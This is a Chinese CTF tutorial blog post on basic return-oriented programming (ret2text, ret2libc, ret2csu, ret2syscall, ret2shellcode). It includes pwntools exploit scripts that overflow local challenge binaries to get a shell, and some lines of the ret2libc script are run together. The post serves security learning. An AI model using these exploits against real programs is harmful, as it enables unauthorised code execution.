基础ROP之:ret2text,ret2libc,ret2syscall,ret2shellcode

2024-01-30 10:12

本文主要是介绍基础ROP之:ret2text,ret2libc,ret2syscall,ret2shellcode,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在上一篇文章中学习了gdb和pwntools的基本使用后,这篇文章来带领大家入门pwn,包括:ret2text,ret2libc,ret2syscall,ret2shellcode。

ret2text

ret2text实际上就是最简单的一类pwn题目了,text就是程序中的可执行代码段,也就是说,程序中本来就写好了后门函数,我们通过溢出,修改返回地址,以执行后门程序,即可完成pwn。
例:ret2libc(点击题目可以获取附件)
ret2text
可以明显看出,这个程序是存在栈溢出漏洞的,而且,还存在一个后门函数:
source
这里漏洞利用方式也很简单,利用栈溢出劫持程序执行流程,使其执行后门函数即可拿到shell
编写exp:

from pwn import *
p=process("./ret2text")
sys_addr=0x0804863A
payload=b'a'*112+p32(sys_addr)
p.sendline(payload)
p.interactive()

ret2libc

但是在很多时候,我们程序中肯定不会留出后门函数的,这时候,我们即没有system函数,也没有"\bin\sh"的字符串,这时候我们该如何利用漏洞呢?
比如说,我们在一个C语言程序中调用了printf函数,这个函数不是我们自己实现的,而是使用了链接库,但是这里有一个问题,使用链接库的时候,链接库所有的函数都被加载进来了,也就是说,system函数也被加载进来了,这时候我们就就可以使用system函数了。
在这之前,需要先补一点延迟绑定的机制,了解之前可以先了解以下Windows下的延迟绑定机制:动态绑定,多态(带你从本质了解多态)注意这里只用看动态绑定的内容就可以。
这里给出plt和got表的寻址过程:
在这里插入图片描述
在这里插入图片描述
关于plt表和got表,可以看大佬视频讲解,讲解的非常详细:视频
这里以ret2libc3为例讲解(点击题目可以获取附件)

  • 1.checksec查看保护
    checksec
    这里只开启了NX,大概率就是栈溢出的利用了
  • 2.然后我们通过IDA分析:
    IDA
    这里可以明显地看出get(s)这里存在栈溢出,但是我们从左边边栏查看,是否有后门函数,很明显,连system函数的调用都没有,肯定没有后门函数,但是我们知道libc库是每个程序包含的,我们就要通过泄露已经运行过的libc库中的函数地址,然后计算出libc基址,然后,通过偏移,调用system函数。
    这里在栈溢出之前使用了puts函数,我们就来泄露这个函数地址

漏洞利用思路:

首先,程序里面没有后门函数,我们首先要利用漏洞泄露已经使用过的libc库中的函数地址,然后回到主函数(如果是再次运行程序的话,函数地址会改变),然后通过偏移计算出system和’/bin/sh’的地址,重新布置栈帧,拿到shell

  • 如何泄露函数地址?
    我们将栈帧这样布置:
    栈帧
    我们将栈帧这样布置之后,当前函数执行完,ret的时候,就会再次执行puts,并且参数为puts函数的真实地址(也就是puts的got表的地址,执行过一次之后,got表项就会存储函数的真实地址),然后返回到main函数中再次执行,这时候我们通过偏移计算出需要的地址,重新布置栈帧,就可以运行后门函数了。

exp:

from pwn import *p=process('./ret2libc3')
puts_plt = 0x08048460
puts_got = 0x0804A018
start_addr = 0x080484D0payload1 = b'A'*112+p32(puts_plt)+p32(start_addr)+p32(puts_got)
p.sendlineafter("!?",payload1)
puts_addr=u32(p.recv(4))print("puts_addr:",hex(puts_addr))offset_puts = 0x000732A0
offset_system = 0x00048170
offset_bin_sh = 0x001BD0D5
libc_system = puts_addr - offset_puts + offset_system
libc_bin_sh = puts_addr - offset_puts + offset_bin_shpayload2 = b'a' * 112 + p32(libc_system) + p32(1234) + p32(libc_bin_sh)
p.sendlineafter("!?",payload2)
p.interactive()

ret2csu

当我们稍微熟悉rop之后,我们就可以来学习ret2csu了,ret2csu实际上和普通的rop差不多,但是这里是利用了一个x64下一个特殊的函数,使得我们执行函数变得更简单:
就是这个_libc_csu_init函数:(只要是个正常的x64位程序,基本上都有这个函数)
_libc_csu_init

漏洞利用方式:

对于普通的程序员,可能看不出来有什么问题,但是对于我们搞安全的来说,这个函数可谓是可以执行三个参数以内的任何函数。
我们来看看这个函数:
call之前的三个参数:
mov rdx,r13;mov rsi,r14;mov edi,r15d:我们观察发现,函数的三个参数,由寄存器r13,r14,r15控制
call ds:[r12 + rbx * 8]:这一句指令,只要我们将r12指定为我们的目标函数,将rbx置零,就可以实现执行我们需要的函数
在执行完函数之后add rbx,1;cmp rbx,rbp;jnz :这一段我们只要控制rbp = rbx + 1,在执行完函数之后我们即可正常返回
至此,好像这个函数利用很复杂,我们要控制六个寄存器:r12,r13,r14,r15,rbx,rbp
但是我们往下面看:

pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15

这里正好是这六个寄存器,而且是连续的,而且设置这六个寄存器之后,还有ret指令
至此,我们的漏洞利用思路就出来了:将rbx,rbp,r12,r13,r14,r15寄存器的值放置栈帧,ret到loc_400826,然后再将ret指令设置到这里的loc_400810,即可完成函数调用。
我们的栈帧布置如下:
ret2csu

ret2syscall

在理解了ret2libc之后,新的问题又出现了,如果这个程序没有调用system函数,而且连libc都没有调用,也就是我们常说的静态链接的程序,这时候,我们根本就没有system函数,我们该如何拿到shell呢?
实际上,即使没有调用libc,我们还是有机会拿到shell的,这种方法就比较接近底层了,我们在三环调用的API,都会通过调用0环的API来完成功能,那么我们没有三环的API,我们能否直接去调用底层的API呢?
答案是可以的,这里先补充一点系统调用的知识:

  1. 系统调用是通过一个系统服务号,然后调用一个共同的函数完成的
  2. 64位程序通过syscall完成系统调用,32位程序通过int 80h完成系统调用
    那么我们要劫持流程就变得比较简单了,我们只要知道了我们所需函数的系统服务号,然后直接系统调用,就可以完成功能。

这里打个比方:
比如说我们要调用execve("/bin/sh",NULL,NULL),但是程序中没有system函数,那么我们该如何完成呢?
实际上,我们只要知道了execve的系统服务号,传递参数,然后直接系统调用就可以了:
3. 我们通过这个命令来查询系统服务号:cat /usr/include/asm/unistd_32.h | grep execve
4. 得到系统服务号为11,然后我们传递参数:我们需要的是:eax=0xb,ebx=/bin/sh 的地址,ecx=0,edx=0
5. 传递参数相比大家都会(通过ROPgadget打出ROP链)
6. 我们传递完参数之后将ret地址指向系统调用的地址即可完成功能

寄存器传参顺序

64位:rdi,rsi,rdx,rcx,r8,r9
32位:除非是特殊的调用约定,否则使用栈帧传递,eax为第一个参数,ebx为第二个参数, ecx为第三个参数,往下依次为edx以及esi和edi。

ret2shellcode

我们现在做的很多题目,都是堆栈不可执行,如果要使堆栈可执行,就要用到修改内存属性的函数,这属于比较高级的利用方式,所以我们很少用到shellcode,但是我们还是要了解shellcode的使用。
比如说,堆栈可执行(或者通过修改内存属性,使堆栈可执行,这时候我们就可以将shellcode放入栈中,然后将返回地址指向shellcode,我们就能顺利拿到shell。
shellcode还有很多高级用法,比如说字节限制,变形,绕过检测等等,这里不再做详细的解释,毕竟刚入门的小白接触的几率不大(如果说有读者向详细学习的话可以私信我,我可以出博客)
好了,这篇文章的介绍就到这里,如果文章中有什么本质上的错误或者是理解上的错误,还请各位大佬指正,我们共同将进步!!!

这篇关于基础ROP之:ret2text,ret2libc,ret2syscall,ret2shellcode的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/659914

相关文章

零基础学习Redis(10) -- zset类型命令使用

zset是有序集合,内部除了存储元素外,还会存储一个score,存储在zset中的元素会按照score的大小升序排列,不同元素的score可以重复,score相同的元素会按照元素的字典序排列。 1. zset常用命令 1.1 zadd  zadd key [NX | XX] [GT | LT]   [CH] [INCR] score member [score member ...]

【Linux 从基础到进阶】Ansible自动化运维工具使用

Ansible自动化运维工具使用 Ansible 是一款开源的自动化运维工具,采用无代理架构(agentless),基于 SSH 连接进行管理,具有简单易用、灵活强大、可扩展性高等特点。它广泛用于服务器管理、应用部署、配置管理等任务。本文将介绍 Ansible 的安装、基本使用方法及一些实际运维场景中的应用,旨在帮助运维人员快速上手并熟练运用 Ansible。 1. Ansible的核心概念

AI基础 L9 Local Search II 局部搜索

Local Beam search 对于当前的所有k个状态,生成它们的所有可能后继状态。 检查生成的后继状态中是否有任何状态是解决方案。 如果所有后继状态都不是解决方案,则从所有后继状态中选择k个最佳状态。 当达到预设的迭代次数或满足某个终止条件时,算法停止。 — Choose k successors randomly, biased towards good ones — Close

音视频入门基础:WAV专题(10)——FFmpeg源码中计算WAV音频文件每个packet的pts、dts的实现

一、引言 从文章《音视频入门基础:WAV专题(6)——通过FFprobe显示WAV音频文件每个数据包的信息》中我们可以知道,通过FFprobe命令可以打印WAV音频文件每个packet(也称为数据包或多媒体包)的信息,这些信息包含该packet的pts、dts: 打印出来的“pts”实际是AVPacket结构体中的成员变量pts,是以AVStream->time_base为单位的显

C 语言基础之数组

文章目录 什么是数组数组变量的声明多维数组 什么是数组 数组,顾名思义,就是一组数。 假如班上有 30 个同学,让你编程统计每个人的分数,求最高分、最低分、平均分等。如果不知道数组,你只能这样写代码: int ZhangSan_score = 95;int LiSi_score = 90;......int LiuDong_score = 100;int Zhou

c++基础版

c++基础版 Windows环境搭建第一个C++程序c++程序运行原理注释常亮字面常亮符号常亮 变量数据类型整型实型常量类型确定char类型字符串布尔类型 控制台输入随机数产生枚举定义数组数组便利 指针基础野指针空指针指针运算动态内存分配 结构体结构体默认值结构体数组结构体指针结构体指针数组函数无返回值函数和void类型地址传递函数传递数组 引用函数引用传参返回指针的正确写法函数返回数组

【QT】基础入门学习

文章目录 浅析Qt应用程序的主函数使用qDebug()函数常用快捷键Qt 编码风格信号槽连接模型实现方案 信号和槽的工作机制Qt对象树机制 浅析Qt应用程序的主函数 #include "mywindow.h"#include <QApplication>// 程序的入口int main(int argc, char *argv[]){// argc是命令行参数个数,argv是

【MRI基础】TR 和 TE 时间概念

重复时间 (TR) 磁共振成像 (MRI) 中的 TR(重复时间,repetition time)是施加于同一切片的连续脉冲序列之间的时间间隔。具体而言,TR 是施加一个 RF(射频)脉冲与施加下一个 RF 脉冲之间的持续时间。TR 以毫秒 (ms) 为单位,主要控制后续脉冲之前的纵向弛豫程度(T1 弛豫),使其成为显著影响 MRI 中的图像对比度和信号特性的重要参数。 回声时间 (TE)

Java基础回顾系列-第七天-高级编程之IO

Java基础回顾系列-第七天-高级编程之IO 文件操作字节流与字符流OutputStream字节输出流FileOutputStream InputStream字节输入流FileInputStream Writer字符输出流FileWriter Reader字符输入流字节流与字符流的区别转换流InputStreamReaderOutputStreamWriter 文件复制 字符编码内存操作流(

Java基础回顾系列-第五天-高级编程之API类库

Java基础回顾系列-第五天-高级编程之API类库 Java基础类库StringBufferStringBuilderStringCharSequence接口AutoCloseable接口RuntimeSystemCleaner对象克隆 数字操作类Math数学计算类Random随机数生成类BigInteger/BigDecimal大数字操作类 日期操作类DateSimpleDateForma